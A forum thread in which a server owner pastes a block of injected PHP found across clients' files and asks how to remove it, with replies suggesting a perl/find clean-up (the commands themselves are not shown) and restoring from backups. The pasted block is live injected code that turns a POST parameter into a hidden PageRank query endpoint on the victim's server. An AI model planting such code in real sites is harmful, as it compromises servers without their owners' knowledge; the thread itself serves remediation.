Need to remove dynamic string across multiple lines and files.
 

I know there have been numerous posts on this but I cannot seems to figure out a solution for my dilemma.

My server was hit with an injection script which has placed code across many of my clients files. I need a script that can remove a block of php code that spans multiple lines, multiple directories/files and is dynamic, meaning that part of the code changes. I think using find/sed is what I need but cannot seem to figure out how to get it to work.

The following is the script that is being injected everywhere. The catch is that they have generated dynamic code at the start/end of the script. (I have commented the parts that are dynamically changing on EVERY instance).

PLEASE NOTE: Directly following this script is the start of a valid php script that I do not want to delete.

<?php
//{{65281980 - DYNAMIC!!

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);

$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;

$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);

for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}

$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}

return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
error_reporting($olderrxxx);
}

//}}459611f4 - DYNAMIC CODE!!
?>

-- START OF VALID CODE - DO NOT DELETE BELOW THIS LINE--

<?php
/**
* @version

Thank you immensely for anyone who can help with this pressing issue. Joe

You can strip out multiline matches using various tools including perl, eg:
The '-p0777' turns off the separator so that the whole file will be slurped in. The search and replace looks for the start and end of the php script in the file, using *? so that it minimally matches, otherwise it will match across multiple php scripts. And the 's' on the regular expression is so that the '.' matches will include newline characters. I have used the string 'toolbarqueries' as a signature to try to match only the offending scripts, but it might need to be more specific, as a false match would be bad.

You can then use find to do this across multiple files, eg:
Test the command on some sample files before unleashing it on the whole system, there is no undo! It would of course be safer to just restore the damaged files from backups if this is an option.

I'm assuming that crackers are modifying your files, and you want to fix the files? Here is how you do it:

1. Disconnect your servers from the internet.

2. Restore all your servers from backups.

3. Fix injection error/bug.

4. Connect servers back to the internet.